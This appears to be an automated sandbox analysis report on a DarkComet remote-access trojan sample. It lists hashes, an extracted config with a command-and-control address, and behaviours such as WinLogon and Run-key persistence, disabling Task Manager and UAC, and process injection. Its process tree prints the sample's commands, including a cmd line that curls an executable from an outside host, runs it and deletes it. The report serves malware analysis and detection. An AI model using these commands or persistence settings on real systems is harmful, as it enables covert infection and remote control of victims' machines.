Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2024 07:36
Static task
static1
Behavioral task
behavioral1
Sample
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe
Resource
win10v2004-20241007-en
General
-
Target
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe
-
Size
5.3MB
-
MD5
c13d6d5a9aa229499ee0ff1f698a2ee0
-
SHA1
2a7ac214047525c963cfd8d1be692c50bdbb9c46
-
SHA256
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba
-
SHA512
5c9e4b30dbd6c5414ea04a70b109e6dc9f8287affe014e47ed0797ff63ac904223751557e44bff99cf8ecfce3c8b748cef55c1d3db88905431f4049039042059
-
SSDEEP
98304:aOQGc830HeOIk0ons6U523lPWZIERFog7icldle+HJFD4:hrj30qkXnsr2YIIog7if+HJFs
Malware Config
Extracted
darkcomet
GoogleDebugger
147.185.221.24:14161
RO_MUTEX-8HU43EZ
-
InstallPath
ChromeCookies\ChromeCookie.exe
-
gencode
WN0BLB8aPxBw
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
GoogleDebugJ
Signatures
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe,C:\\Windows\\TEMP\\ChromeCookies\\ChromeCookie.exe" IntelGpuUpdater.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3896 attrib.exe 4592 attrib.exe 4808 attrib.exe 3180 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation test.exe -
Executes dropped EXE 12 IoCs
pid Process 1440 test.exe 4624 ChromeCookie.exe 1852 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3308 IntelGpuUpdater.exe 4392 ChromeCookie.exe 1628 IntelGpuUpdater.exe 5040 IntelGpuUpdater.exe 1696 IntelGpuUpdater.exe 2724 IntelGpuUpdater.exe 5084 IntelGpuUpdater.exe 4448 IntelGpuUpdater.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" ChromeCookie.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" iexplore.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4624 set thread context of 432 4624 ChromeCookie.exe 101 PID 4392 set thread context of 3864 4392 ChromeCookie.exe 134 -
resource yara_rule behavioral2/files/0x0008000000023cbe-8.dat upx behavioral2/memory/1440-10-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4624-47-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/432-46-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1440-50-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3308-62-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4392-96-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4392-99-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3308-100-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1628-102-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/5040-105-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1696-108-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2724-110-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/5084-113-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4448-116-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\IntelGpuUpdaterHelper.exe cmd.exe File opened for modification C:\Windows\IntelGpuUpdater.exe attrib.exe File created C:\Windows\IntelGpuUpdater.exe cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3152 sc.exe 428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2936 2964 WerFault.exe 102 -
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1912 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad notepad.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fMatchCase = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fWrapAround = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000c937b479e846db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000c937b479e846db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d8d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fPasteOriginalEOL = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a474aa79e846db01 IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fReverse = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000c937b479e846db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000bc39af79e846db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000ea9ab179e846db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software ChromeCookie.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ test.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe 3348 IntelGpuUpdaterHelper.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1440 test.exe Token: SeSecurityPrivilege 1440 test.exe Token: SeTakeOwnershipPrivilege 1440 test.exe Token: SeLoadDriverPrivilege 1440 test.exe Token: SeSystemProfilePrivilege 1440 test.exe Token: SeSystemtimePrivilege 1440 test.exe Token: SeProfSingleProcessPrivilege 1440 test.exe Token: SeIncBasePriorityPrivilege 1440 test.exe Token: SeCreatePagefilePrivilege 1440 test.exe Token: SeBackupPrivilege 1440 test.exe Token: SeRestorePrivilege 1440 test.exe Token: SeShutdownPrivilege 1440 test.exe Token: SeDebugPrivilege 1440 test.exe Token: SeSystemEnvironmentPrivilege 1440 test.exe Token: SeChangeNotifyPrivilege 1440 test.exe Token: SeRemoteShutdownPrivilege 1440 test.exe Token: SeUndockPrivilege 1440 test.exe Token: SeManageVolumePrivilege 1440 test.exe Token: SeImpersonatePrivilege 1440 test.exe Token: SeCreateGlobalPrivilege 1440 test.exe Token: 33 1440 test.exe Token: 34 1440 test.exe Token: 35 1440 test.exe Token: 36 1440 test.exe Token: SeIncreaseQuotaPrivilege 4624 ChromeCookie.exe Token: SeSecurityPrivilege 4624 ChromeCookie.exe Token: SeTakeOwnershipPrivilege 4624 ChromeCookie.exe Token: SeLoadDriverPrivilege 4624 ChromeCookie.exe Token: SeSystemProfilePrivilege 4624 ChromeCookie.exe Token: SeSystemtimePrivilege 4624 ChromeCookie.exe Token: SeProfSingleProcessPrivilege 4624 ChromeCookie.exe Token: SeIncBasePriorityPrivilege 4624 ChromeCookie.exe Token: SeCreatePagefilePrivilege 4624 ChromeCookie.exe Token: SeBackupPrivilege 4624 ChromeCookie.exe Token: SeRestorePrivilege 4624 ChromeCookie.exe Token: SeShutdownPrivilege 4624 ChromeCookie.exe Token: SeDebugPrivilege 4624 ChromeCookie.exe Token: SeSystemEnvironmentPrivilege 4624 ChromeCookie.exe Token: SeChangeNotifyPrivilege 4624 ChromeCookie.exe Token: SeRemoteShutdownPrivilege 4624 ChromeCookie.exe Token: SeUndockPrivilege 4624 ChromeCookie.exe Token: SeManageVolumePrivilege 4624 ChromeCookie.exe Token: SeImpersonatePrivilege 4624 ChromeCookie.exe Token: SeCreateGlobalPrivilege 4624 ChromeCookie.exe Token: 33 4624 ChromeCookie.exe Token: 34 4624 ChromeCookie.exe Token: 35 4624 ChromeCookie.exe Token: 36 4624 ChromeCookie.exe Token: SeIncreaseQuotaPrivilege 432 iexplore.exe Token: SeSecurityPrivilege 432 iexplore.exe Token: SeTakeOwnershipPrivilege 432 iexplore.exe Token: SeLoadDriverPrivilege 432 iexplore.exe Token: SeSystemProfilePrivilege 432 iexplore.exe Token: SeSystemtimePrivilege 432 iexplore.exe Token: SeProfSingleProcessPrivilege 432 iexplore.exe Token: SeIncBasePriorityPrivilege 432 iexplore.exe Token: SeCreatePagefilePrivilege 432 iexplore.exe Token: SeBackupPrivilege 432 iexplore.exe Token: SeRestorePrivilege 432 iexplore.exe Token: SeShutdownPrivilege 432 iexplore.exe Token: SeDebugPrivilege 432 iexplore.exe Token: SeSystemEnvironmentPrivilege 432 iexplore.exe Token: SeChangeNotifyPrivilege 432 iexplore.exe Token: SeRemoteShutdownPrivilege 432 iexplore.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 432 iexplore.exe 3864 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4416 wrote to memory of 2336 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 86 PID 4416 wrote to memory of 2336 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 86 PID 4416 wrote to memory of 2336 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 86 PID 2336 wrote to memory of 228 2336 cmd.exe 87 PID 2336 wrote to memory of 228 2336 cmd.exe 87 PID 2336 wrote to memory of 228 2336 cmd.exe 87 PID 4416 wrote to memory of 3460 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 88 PID 4416 wrote to memory of 3460 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 88 PID 4416 wrote to memory of 3460 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 88 PID 3460 wrote to memory of 1764 3460 cmd.exe 89 PID 3460 wrote to memory of 1764 3460 cmd.exe 89 PID 3460 wrote to memory of 1764 3460 cmd.exe 89 PID 1764 wrote to memory of 2628 1764 cmd.exe 90 PID 1764 wrote to memory of 2628 1764 cmd.exe 90 PID 1764 wrote to memory of 2628 1764 cmd.exe 90 PID 1764 wrote to memory of 1440 1764 cmd.exe 91 PID 1764 wrote to memory of 1440 1764 cmd.exe 91 PID 1764 wrote to memory of 1440 1764 cmd.exe 91 PID 1764 wrote to memory of 1912 1764 cmd.exe 92 PID 1764 wrote to memory of 1912 1764 cmd.exe 92 PID 1764 wrote to memory of 1912 1764 cmd.exe 92 PID 1440 wrote to memory of 2236 1440 test.exe 93 PID 1440 wrote to memory of 2236 1440 test.exe 93 PID 1440 wrote to memory of 2236 1440 test.exe 93 PID 1440 wrote to memory of 3644 1440 test.exe 95 PID 1440 wrote to memory of 3644 1440 test.exe 95 PID 1440 wrote to memory of 3644 1440 test.exe 95 PID 2236 wrote to memory of 3180 2236 cmd.exe 97 PID 2236 wrote to memory of 3180 2236 cmd.exe 97 PID 2236 wrote to memory of 3180 2236 cmd.exe 97 PID 3644 wrote to memory of 3896 3644 cmd.exe 98 PID 3644 wrote to memory of 3896 3644 cmd.exe 98 PID 3644 wrote to memory of 3896 3644 cmd.exe 98 PID 1440 wrote to memory of 4624 1440 test.exe 100 PID 1440 wrote to memory of 4624 1440 test.exe 100 PID 1440 wrote to memory of 4624 1440 test.exe 100 PID 4624 wrote to memory of 432 4624 ChromeCookie.exe 101 PID 4624 wrote to memory of 432 4624 ChromeCookie.exe 101 PID 4624 wrote to memory of 432 4624 ChromeCookie.exe 101 PID 4624 wrote to memory of 432 4624 ChromeCookie.exe 101 PID 4624 wrote to memory of 432 4624 ChromeCookie.exe 101 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 432 wrote to memory of 2964 432 iexplore.exe 102 PID 4416 wrote to memory of 4188 4416 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 107 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4808 attrib.exe 3180 attrib.exe 3896 attrib.exe 4592 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe"C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && " > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\SysWOW64\cmd.execmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "3⤵
- System Location Discovery: System Language Discovery
PID:228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:2628
-
-
C:\Users\Admin\AppData\Local\test.exeC:\Users\Admin\AppData\Local\test.exe4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
